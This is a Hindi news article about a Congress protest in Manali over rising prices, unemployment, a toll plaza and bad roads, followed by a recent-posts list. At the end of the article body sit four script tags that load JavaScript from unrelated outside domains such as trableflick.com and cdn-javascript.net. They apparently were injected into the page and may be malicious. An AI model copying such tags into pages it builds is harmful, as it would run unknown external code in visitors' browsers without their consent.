Categories: हिमाचल

कुल्लूः मनाली कांग्रेस ने बढ़ती महंगाई को लेकर केंद्र और राज्य सरकार के खिलाफ किया प्रदर्शन

<p>पर्यटन नगरी मनाली में कांग्रेस ने बढ़ती हुई महंगाई, बेरोजगारी को लेकर केंद्र और राज्य सरकार को बुरी तरह से घेरा। मनाली कांग्रेस अध्यक्ष हरी चंद शर्मा के नेतृत्व में सैंकड़ों कार्यकर्ताओं और लोगों ने केंद्र और राज्य सरकार के खिलाफ जोरदार नारेबाजी की और महंगाई को लेकर केंद्र सरकार को एक ज्ञापन भी भेजा। इस मौके पर अध्यक्ष हरीचंद शर्मा ने कहा कि भारत सरकार ने डीजल, पेट्रोल के साथ-साथ रसोई गैस की कीमतों में भारी बढौतरी की है जिसे वापिस लिया जाए।</p>

<p>उन्होंने कहा कि प्रदेश सरकार द्वारा कीटनाशक दवाईयों पर दी जाने वाली सब्सिडी को समाप्त करने और खाद के दामों में भारी वृद्वि के फैसले को वापिस नहीं लिया तो आन्दोलन छेड़ा जाएगा। इसके अलावा इस प्रदर्शन के माध्यम से एनएचएआई द्वारा डोहलूनाला में लगे टोल प्लाजा का भी उन्होंने विरोध किया है। उन्होंने इस टॉल प्लाजा को हटाने की भी मांग उठाई है और साथ में कुल्लू मनाली सड़क पर ब्लैक स्पॉट को तुरंत दुरूस्त करने की भी मांग की है।</p>

<p>हरी चंद शर्मा ने कहा कि मनाली की वामतट माग्र सहित सभी लिंक सड़कों का हालत बहुत ही दयनीय है। लेकिन इन्हें सुधारने के लिए कोई प्रयास नहीं किए जा रहे हैं। उन्होंने इस मौके पर यह भी मांग की है कि मनाली क्षेत्र के गांवों को नगर नियोजन विभाग से बाहर किया जाए और मनाली में अतिरिक्त पार्किंग की व्यवस्था की जाए। उन्होंने इस दौरान केंद्र और राज्य सरकार के खिलाफ जमकर नारेबाजी भी की।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1582539069174″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

बिझडी बाजार में कार और स्कूटी में टक्‍कर, मचा बवाल

  Hamirpur: उपमंडल बड़सर के बिझडी बाजार में उस समय अफरा तफरी का माहौल बन…

11 hours ago

Kangana Ranaut: सत्ता पाने के लिए देश के विभाजन से भी नहीं हिचकिचाते राहुल गांधी

  Mandi:खड्गे और जेपी नड्डा की पत्रवार के बीच मंडी से भाजपा सांसद और एक्‍ट्रेस…

11 hours ago

राजनीति में घुला जहर, पीएम रखें पद की गरिमा: प्रियंका

Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार को…

11 hours ago

राजनीति में घुला जहर, पीएम रखें पद की गरिमा: प्रियंका

  Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार…

11 hours ago

Uttar Pradesh: जमानत पर रिहा दुष्कर्म के आरोपी ने पीड़िता की गोली मारकर हत्या की

UP: दुष्कर्म का आरोपी और जमानत पर जेल से बाहर आए एक व्यक्ति ने दुष्कर्म…

11 hours ago

पेंशनरों की मांगों पर मुख्यमंत्री को ज्ञापन, सुधार की गुहार

  Nahan/Hamirpur: राज्‍य कार्यकारिणी के आह्वान पर अपनी मांगों को पेंशनरों ने जिला मुख्‍यालयों में…

12 hours ago